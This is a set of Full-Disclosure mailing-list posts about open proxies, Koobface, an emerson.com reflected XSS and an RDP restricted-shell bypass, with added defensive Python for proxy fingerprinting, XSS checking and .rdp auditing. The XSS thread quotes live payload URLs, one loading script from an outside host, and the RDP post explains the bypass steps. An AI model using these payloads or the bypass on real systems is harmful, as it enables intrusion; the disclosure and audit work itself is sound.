[Full-disclosure] McAfee Relay Server Product Installs Open Proxy On Consumer PCs
Earlier today I noticed I was getting a lot of TCP port 6515 proxies on The List (http://www.mrhinkydink.com/proxies.htm). Curious, I checked one and it gave me a Via header of:

1.1 Fran-PC (McAfee Relay Server 5.2.3)

Then I took a peek at the database. Nearly 1900 of these things since December 1st, 2011.

Although the name of the PC above is a dead giveaway that this is some sort of consumer product ([name-of-owner]-PC is the default Windows machine name created during setup), a quick check of the DNS names of these boxes confirms they are all on residential IP addresses.

So what is McAfee Relay Server? I'm guessing it's one of those snarky products they stick you with whenever you buy a new PC. This makes sense, since December is a big month for new PCs.

But why install it as an open proxy? If it's a security product I hope it's a honeypot.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
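The triage described in the post (look at the Via header a proxy stamps on relayed traffic, read the product out of its comment, and notice that the received-by token is a default "<owner>-PC" Windows name) can be scripted. The following is an added example, not code from the post or from McAfee: a Via header parser following the RFC 7230 grammar (comma-separated hops of received-protocol, received-by and an optional parenthesised comment), a product/version extractor for the comment, and the "-PC" heuristic. The sample response is constructed; only the Via value is the one quoted in the post, and the heuristic is an assumption that will also match ordinary hostnames ending in -PC.

```python
"""Triage a suspected open HTTP proxy from its Via header.

Added example, not code from the original post.  It parses the Via header
(RFC 7230 syntax: one or more "received-protocol received-by [comment]" hops,
comma separated), pulls product and version out of the comment, and flags
received-by tokens that look like the default "<owner>-PC" Windows machine
name the post mentions.  SAMPLE_RESPONSE is a constructed response carrying
the exact Via value quoted in the post; nothing is fetched from the network.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One hop: received-protocol RWS received-by [ RWS comment ]
# received-protocol may carry a protocol name ("HTTP/1.1") or just a version ("1.1").
# Comments are kept flat (nested parentheses are not handled; rare in practice).
_HOP_RE = re.compile(
    r"""\s*(?P<proto>[\w.\-]+(?:/[\w.\-]+)?)   # received-protocol
        \s+(?P<by>[^\s,(]+)                   # received-by: host[:port] or pseudonym
        (?:\s*\((?P<comment>[^)]*)\))?        # optional ( comment ), may contain commas
        \s*""",
    re.VERBOSE,
)

# Assumption: a bare alphanumeric label followed by "-PC" is treated as the default
# consumer Windows name the post describes; real hostnames may also match.
_DEFAULT_WIN_NAME = re.compile(r"^[A-Za-z0-9]+-PC$", re.IGNORECASE)


@dataclass
class ViaHop:
    protocol: str
    received_by: str
    comment: Optional[str]


def parse_via(value: str) -> List[ViaHop]:
    """Split a Via header value into hops, respecting commas inside comments."""
    hops: List[ViaHop] = []
    pos = 0
    while pos < len(value):
        m = _HOP_RE.match(value, pos)
        if not m or m.end() == pos:
            raise ValueError(f"unparseable Via hop at offset {pos}: {value[pos:]!r}")
        hops.append(ViaHop(m.group("proto"), m.group("by"), m.group("comment")))
        pos = m.end()
        if pos < len(value):
            if value[pos] != ",":
                raise ValueError(f"expected ',' at offset {pos}: {value[pos:]!r}")
            pos += 1
    return hops


def via_from_response(raw: bytes) -> List[ViaHop]:
    """Collect every Via header from a raw HTTP response head (several are allowed)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    hops: List[ViaHop] = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, val = line.partition(":")
        if sep and name.strip().lower() == "via":
            hops.extend(parse_via(val.strip()))
    return hops


def product_version(hop: ViaHop) -> Optional[Tuple[str, str]]:
    """'McAfee Relay Server 5.2.3' -> ('McAfee Relay Server', '5.2.3'); None if no version."""
    if not hop.comment:
        return None
    m = re.match(r"^(.*?)\s+(\d+(?:\.\d+)*)$", hop.comment.strip())
    return (m.group(1), m.group(2)) if m else None


def looks_like_consumer_pc(hop: ViaHop) -> bool:
    return bool(_DEFAULT_WIN_NAME.match(hop.received_by))


# Constructed response: the Via value is the one quoted in the post, the rest is filler.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Via: 1.1 Fran-PC (McAfee Relay Server 5.2.3)\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for hop in via_from_response(SAMPLE_RESPONSE):
        tag = "consumer-PC name" if looks_like_consumer_pc(hop) else ""
        print(hop.received_by, product_version(hop), tag)
```

In practice you would feed `via_from_response` the bytes you get back from sending a request through the candidate host:port; the Via value is added by the proxy itself, so it is the most reliable fingerprint the post relies on, and the reverse DNS check the post describes is a separate step.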
Re: [Full-disclosure] XSS Vulnerability in www.emerson.com
That... ahem... particular company has had that particular page (/MCS/Email.aspx) in one form or another for a long time, since the late 90s at least, when it was a CGI app. IIRC, at one time you could SPAM anyone through it, but they learned their lesson and now you can only SPAM the company's employees. Considering the business they're in (think SCADA related) this could be a Bad Thing. The XSS is just the icing on the cake.

I find it interesting that they upgraded it to SharePoint. It's an in-house app, one of several. I believe the security model used to be "no one knows the URL".

I'm guessing you're a contractor for that particular company because, after all, no one knows the URL.

On Mon, 2011-09-05 at 02:00 +0530, Madhur Ahuja wrote:
> One of the pages on the Emerson site is rendering the query string parameter without any inspection. This makes it possible to inject malicious content as shown below:
>
> http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg%20src='http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E
>
> http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=%22http://madhur.github.com/files/js/site.js%22%20type=%22text/javascript%22%3E
>
> --
> Madhur
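The report above is a textbook reflected XSS: a query-string parameter (Title) is written into the page without output encoding. As an added example, not the Emerson page's code, the following shows the reflected pattern beside its encoded form and the check a tester runs on a response to tell an exploitable reflection from a correctly encoded one. The two render functions are stand-ins for whatever the real Email.aspx does; the only facts taken from the report are the URL and that Title comes back raw.

```python
"""Reflected XSS of the kind reported above: a query-string parameter echoed
into the page without encoding.

Added example, not the Emerson page's code.  render_vulnerable and
render_hardened are stand-ins for whatever the real Email.aspx does; the only
thing taken from the report is the URL and the fact that Title is reflected
raw.  classify_reflection is the check a tester runs on the response body to
tell an exploitable reflection from a correctly encoded one.
"""
import html
from urllib.parse import parse_qs, urlsplit

# The second URL from the report, reassembled (it was line-wrapped in the mail).
REPORTED_URL = (
    "http://www.emerson.com/_layouts/MCS/Email.aspx?Title="
    "%3Cscript%20src=%22http://madhur.github.com/files/js/site.js%22"
    "%20type=%22text/javascript%22%3E"
)


def title_from_url(url: str) -> str:
    """Decode the Title parameter the way the server sees it (percent-decoding applied)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("Title", [""])[0]


def render_vulnerable(title: str) -> str:
    # Mirrors the reported behaviour: the parameter lands in HTML text unencoded,
    # so a Title of <script ...> becomes live markup.
    return f"<html><body><h1>{title}</h1></body></html>"


def render_hardened(title: str) -> str:
    # Encode for the HTML text context it is inserted into: & < > " ' become entities.
    # (An attribute or JavaScript context would need that context's encoding instead.)
    return f"<html><body><h1>{html.escape(title, quote=True)}</h1></body></html>"


def classify_reflection(payload: str, body: str) -> str:
    """'raw' if the payload came back as live markup, 'escaped' if entity-encoded, else 'absent'.

    The probe must contain HTML metacharacters (< > " ') for 'raw' to mean anything;
    a plain-word payload is identical before and after encoding.
    """
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
        return "escaped"
    return "absent"


if __name__ == "__main__":
    payload = title_from_url(REPORTED_URL)
    print("decoded Title:", payload)
    print("vulnerable page:", classify_reflection(payload, render_vulnerable(payload)))
    print("hardened page:  ", classify_reflection(payload, render_hardened(payload)))
```

Note that `html.escape` is the right fix only for the HTML text context shown here; if the real page dropped Title into an attribute value or a script block, the encoding would have to match that context, which is why the classifier reports the encoding it actually sees rather than assuming one.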
[Full-disclosure] China - the land of open proxies
In July, hundreds of Chinese proxies on port 8909 started showing up every day on public proxy lists. In August the daily numbers were in the thousands.

Here is the list I collected during that period. There are 135K proxies in this file (text, tab delimited, ~8 megs).

http://www.mrhinkydink.com/utmods/135k.txt

You may want to right-click and save as.

This is offered as data you may be able to use for forensic purposes or router block lists. Most of these proxies are currently offline. When they are online, they're very good proxies.

I believe this is similar to the PPLiveVA issue with TCP port 9415 that I noted back in April.

http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html

New port 9415 proxies stopped showing up on proxy lists when 8909 began to take over, which leads me to believe this is the hot new media client (either Youku or QQ) in Chinese-speaking countries.

--Mr. Hinky Dink
walk like a mannequin
roll like a tyre
act on reaction
dodge the Big Spud Fryer
http://mrhinkydink.blogspot.com
Re: [Full-disclosure] Yet Another Chinese Multimedia Player Supplies Thousands Of Open Proxies
On Sun, 2011-08-07 at 16:27 -0400, valdis.kletni...@vt.edu wrote:
> On Sat, 06 Aug 2011 19:59:23 EDT, Mr. Hinky Dink said:
> > 23,000+ showed up in July. Over 16,000 new ones in the first week of August.
> > Somebody doesn't get it.
> > http://mrhinkydink.blogspot.com/2011/08/tcp-port-8909-proxies.html
> > See also...
> > http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html
>
> Doesn't get it? You're making the rash assumption it's not intentional. You yourself say "Government spooks and contractors take note: you can use these to stage your false flag attacks!" Now take it one step further - what if they're intentionally open so the Chinese gov't can launch an attack through them and claim it was somebody else pulling a false flag attack?
>
> You think that's too devious? Go read up on who financed the research that led to TOR - and *why* they financed it. (tl;dr: US Gov. financed it, so the US spooks could more easily fly under the wire mixed in with all the other nefarious people using TOR. So yes, it's patriotic to use TOR so it's even harder to use traffic analysis to track down our spooks. :)

There's always the possibility that *I* don't get it.

Because I'm SOMEBODY dammit!

So... are you a spook or a contractor? Or both?
[Full-disclosure] Yet Another Chinese Multimedia Player Supplies Thousands Of Open Proxies
23,000+ showed up in July. Over 16,000 new ones in the first week of August.

Somebody doesn't get it.

http://mrhinkydink.blogspot.com/2011/08/tcp-port-8909-proxies.html

See also...

http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html
Re: [Full-disclosure] Possible RDP vulnerability
As far as RDP is concerned, it's much simpler (and more fun!) to host an Evil RDP Server than it is to hack into one. There is no end to the shenanigans you can create or the havoc you can wreak, if you're into that kind of thing (just sayin'... as a Big Time Security Professional™, I'm not).

For instance, this low quality, seldom seen, crappy video (barely) shows how you can get a virus/Trojan/worm/etc. if you are insane enough to attach your local drives to an untrusted RDP server (the popup at the end is the AV going off).

http://www.youtube.com/watch?v=UwhqJSmYm_4

EXTRA CREDIT: devise a Group Policy that will prevent users from attaching their local drives to a remote RDP server.

----- Original Message -----
From: wicked clown
To: Thor (Hammer of God)
Cc: Full-Disclosure@lists.grok.org.uk
Sent: Saturday, March 27, 2010 7:39 AM
Subject: Re: [Full-disclosure] Possible RDP vulnerability

I think we are on two different pages :) What I was trying to show is that if you have a group policy that will only run certain applications, for example notepad.exe, the user is unable to access My Computer, Run, the Start button or any other application. There would be a shortcut on the desktop for just notepad.exe for the user to execute.
Re: [Full-disclosure] Possible RDP vulnerability
In your case, had you answered the question correctly I would have promised to never (again) blog about you arguing with Craig S. Wright.

However, it was a trick question. There is no way to do it with Group Policy (at least not with XP and Server 2003... maybe they changed that in Windows Vis7a and Server 2008, but I really haven't kept up with the tech).

----- Original Message -----
From: Thor (Hammer of God) t...@hammerofgod.com
To: Mr. Hinky Dink d...@mrhinkydink.com; Full-Disclosure@lists.grok.org.uk
Sent: Saturday, March 27, 2010 12:09 PM
Subject: RE: [Full-disclosure] Possible RDP vulnerability

Oh, sorry I read the question wrong. Just don't allow them to attach their local drives. Simple.

Still, what do I win?

t
Re: [Full-disclosure] Possible RDP vulnerability
There is a section in RDP-Tcp Properties on the server under Environment for "Do not allow an initial program to be launched. Always show the desktop."

----- Original Message -----
From: wicked clown
To: Full-Disclosure@lists.grok.org.uk
Sent: Friday, March 26, 2010 5:04 AM
Subject: [Full-disclosure] Possible RDP vulnerability

Hi Guys,

I think I possibly may have found a vulnerability with using RDP / Terminal Services on Windows 2003. If you lock down a server and only allow users who connect to your RDP connection to run certain applications, users can bypass this and run ANY application they want.

You can do this by modifying the RDP profile / shortcut and adding your application to the alternate shell and the shell working directory. When the user now connects to the RDP server the banned application will execute upon logging on, even though the user isn't allowed to execute the application if the user logs on normally.

This doesn't work with cmd.exe, but I have been able to execute Internet Explorer, download a modified cmd version, modify the RDP profile to execute the new cmd and it works like a charm. I have only been able to test this on Windows 2003 using a local policy and it works like a treat. Even in the wild!

I have done a quick basic video which can be seen here:

http://www.tombstone-bbs.co.uk/v1d30z/rdp-hack2.swf

Instead of modifying the RDP profile, I just added my application to the program tab. I know the video is crappy but it's just meant to give you an idea what I am talking about :)

So in short, if anybody can access your server via RDP they are NOT restricted by the policy.

I would be interested in any feedback about this possible exploit / vulnerability even if you don't think it is... or even better if someone knows how to defend against it!! LOL! :)

Cheers
Wicked Clown.
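Both halves of this thread come down to settings carried in the client's .rdp file: the "alternate shell" and "shell working directory" entries that the original post uses to get past a locked-down initial program, and the drive redirection entries that the "Evil RDP Server" reply warns about. As an added example that is not code from either poster, here is a small auditor for .rdp files: it parses the name:type:value format (type s for string, i for integer, b for hex bytes) and reports those settings. The setting names are the standard mstsc ones; the sample file is constructed, and the server-side control named in the reply ("Do not allow an initial program to be launched") is a separate, server-side mitigation that this client-file check complements rather than replaces.

```python
"""Audit an .rdp connection file for the two client-side settings this thread
turns on: an alternate shell (the initial-program bypass described above) and
local drive redirection (what attaching your drives to an untrusted server
amounts to).

Added example, not code from either poster.  .rdp files are lines of
name:type:value with type s (string), i (integer) or b (hex bytes); the
setting names used here (alternate shell, shell working directory,
redirectdrives, drivestoredirect, full address) are standard mstsc ones.
SAMPLE_RDP is constructed for the demonstration.
"""
from dataclasses import dataclass
from typing import Dict, List, Union

Value = Union[str, int, bytes]


def parse_rdp(text: str) -> Dict[str, Value]:
    """Parse name:type:value lines.  maxsplit=2 keeps the colon in values like C:\\path."""
    settings: Dict[str, Value] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":", 2)
        if len(parts) != 3:
            raise ValueError(f"line {lineno}: expected name:type:value, got {raw!r}")
        name, typ, val = parts
        name = name.strip().lower()
        if typ == "s":
            settings[name] = val
        elif typ == "i":
            settings[name] = int(val)
        elif typ == "b":
            settings[name] = bytes.fromhex(val)
        else:
            raise ValueError(f"line {lineno}: unknown type {typ!r}")
    return settings


@dataclass
class Finding:
    setting: str
    value: Value
    why: str


def audit_rdp(settings: Dict[str, Value]) -> List[Finding]:
    """Report the settings a locked-down Terminal Server admin would not want to see."""
    findings: List[Finding] = []
    shell = settings.get("alternate shell", "")
    if shell:
        findings.append(Finding("alternate shell", shell,
                                "client asks the server to run this instead of the configured initial program"))
        workdir = settings.get("shell working directory", "")
        if workdir:
            findings.append(Finding("shell working directory", workdir,
                                    "working directory handed to the alternate shell"))
    # Older clients use redirectdrives:i:1; newer ones list drives in drivestoredirect
    # ("*" for all, "C:;D:" for some, empty for none).
    drives = settings.get("drivestoredirect", "")
    if settings.get("redirectdrives", 0) == 1 or drives:
        findings.append(Finding("drive redirection", drives or "redirectdrives=1",
                                "local drives are exposed to the remote host for the session"))
    return findings


# Constructed sample: a connection file edited the way the thread describes.
SAMPLE_RDP = """\
full address:s:ts01.corp.example
redirectdrives:i:1
drivestoredirect:s:*
alternate shell:s:C:\\Users\\Public\\notcmd.exe
shell working directory:s:C:\\Users\\Public
"""

if __name__ == "__main__":
    for f in audit_rdp(parse_rdp(SAMPLE_RDP)):
        print(f"{f.setting}: {f.value!r} -- {f.why}")
```

Run it over the .rdp files you hand to users (or find on a suspect workstation); an "alternate shell" finding on a server that is supposed to pin users to one program is exactly the condition the original post exploits.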
[Full-disclosure] The Hinky Dink Top 10 Koobface Infested Shitholes Report
Today I was inspired by The Norton Top 10 Riskiest Online Cities Report (http://norton.newslinevine.com/Riskiest_Online_Cities_Press_Release.pdf) so I decided to do my own press release with my own data (in light of recent events).

-

The Hinky Dink Top 10 Koobface Infested Shitholes Report Reveals Where Web 2.0's Most PWN3D Users Live

Columbus, Ohio – March 22, 2010 – Mr. Hinky Dink, a Big Time Security Professional™ today released an analysis of the spread of the Koobface worm. Based on an exhaustive study of his database of over two and a half million open Web proxies collected over two years, Hinky's findings demonstrate where the most vulnerable social networking users can be found.

The following are ranked the Hinky Top Ten Social Networking Shitholes:

1. Saint Louis
2. Chicago
3. Kansas City
4. Houston
5. Birmingham
6. Dallas
7. Oklahoma City
8. Los Angeles
9. Brooklyn
10. Columbus

The complete report is available at http://www.mrhinkydink.com/Koobface%20Shithole%20Report%2003-22-2010.pdf

-

http://twitter.com/mrhinkydink
http://mrhinkydink.blogspot.com
[Full-disclosure] Setting the record straight on The Return of Koobface
Today I ran across this article...

http://www.nst.com.my/Current_News/NST/articles/20100320160620/Article/index_html

... in which it is noted that Kaspersky Labs recently discovered the resurgence of the malicious programme (Koobface) and sounded the alarm.

Gentlemen, I beg to differ.

I first mentioned the resurgence of Koobface on February 23rd, 2010 here...

http://proxyobsession.net/?p=827

I admit I did not sound the alarm. I simply lol'd because Koobface is one sign of the EPIC FAIL of the security industry. Just ask Dancho Danchev. He's made quite a name for himself by doing absolutely nothing worthwhile about Koobface except raising his own blood pressure spewing vitriol about The Koobface Gang (sorry, Danny, but I'm not part of the gang. I'm just another BlogSpot loser).

For those wondering, I am not a hacker. I am a Big Time Security Professional (you may remember me if you Google "Websense Policy Bypass" - unfortunately those bastards at Warner Brothers killed the soundtrack to my YouTube video). But I am at heart a skeptic, disappointed at what the security industry has become.

I created my Proxy List (http://www.mrhinkydink.com/proxies.htm) two years ago as a tool for an as yet unpublished paper on open SOCKS proxies in the wild. It has had the unintended side effect of tracking the spread of Koobface, since Kooberz proxies exclusively (until this month) appear on TCP port 8085. And it has tracked it quite well.

I'd like to take this opportunity to say Hello (no, not GREETZ) to all the Cameroonian Puppy Scammers (papa Dollars, STARVO, Dabbleed, et al.) who abuse my proxy list. Enough is enough. Get a real job, fellas.

http://proxyobsession.net
http://mrhinkydink.blogspot.com
http://twitter.com/mrhinkydink : (Follow me! I have no friends!) :
Re: [Full-disclosure] Setting the record straight on The Return ofKoobface
Absolutely you are correct, but if you check the blog there are further references up to last Friday. It was a tremendous, jaw-dropping flood of Kooberz proxies the last two weeks. And it's still coming.

The point is us Little Guys are paying attention, too. And sometimes we catch this shit before the Big Boys like Dancho and Kaspersky wake up and smell the coffee.

Since February I've been wondering Why The Hell I hadn't heard anything in the ITsec press on this new resurgence. Did they hold back so Dancho could publish his "Ten Things You Didn't Know About The Koobface Gang" article? Or so Microsoft could gloat over taking down the Wimpy Waledac botnet? Is the Good News always published before the Bad News in the security industry press release cycle?

The fact remains, Koobface marches on and the security industry can't stop it. Period. I will be among the first to jump up and down and yell RA! when someone takes it down, but it ain't going to happen soon. All I can do is sit back and watch while the Big Boys get their headlines.

BTW, I don't consider myself bitter. I'm what you might call tangy.

Thanks for your support,
Hinky

----- Original Message -----
From: J Roger
To: full-disclosure@lists.grok.org.uk
Sent: Saturday, March 20, 2010 3:28 PM
Subject: Re: [Full-disclosure] Setting the record straight on The Return of Koobface

This reads as "waaa, I noticed this first and didn't think much of it, but now that someone else is making a big deal, I want my credit." Maybe you reported on it first on your blog, with a single sentence that wasn't even the primary focus of the post. Regardless of whether a rise in Koobface is significantly newsworthy or not, you apparently failed to draw enough attention (or the right attention) to it at the time. In other words, maybe you did it first, but someone else did it better.

What's more valuable to an enterprise: someone that quickly writes a risk assessment that's so sloppy the management with authority to act on the findings doesn't even bother to read it, or someone that takes the time to write a report on the same findings that actually speaks to the business and is able to make positive changes happen?

You talk about being bitter towards the security industry (which IS understandable) but maybe it's time to reflect back a little on yourself. Maybe it's not ALL the industry's fault. Maybe the sources of your bitterness have a little something to do with your inability to make enough of the right things happen. Sure you're a Big Time Security Professional, but maybe your blog wasn't enough to get the word out. Maybe you felt it wasn't even worth getting the word out or sounding any alarms. If that's the case though, don't go back now and try to take credit.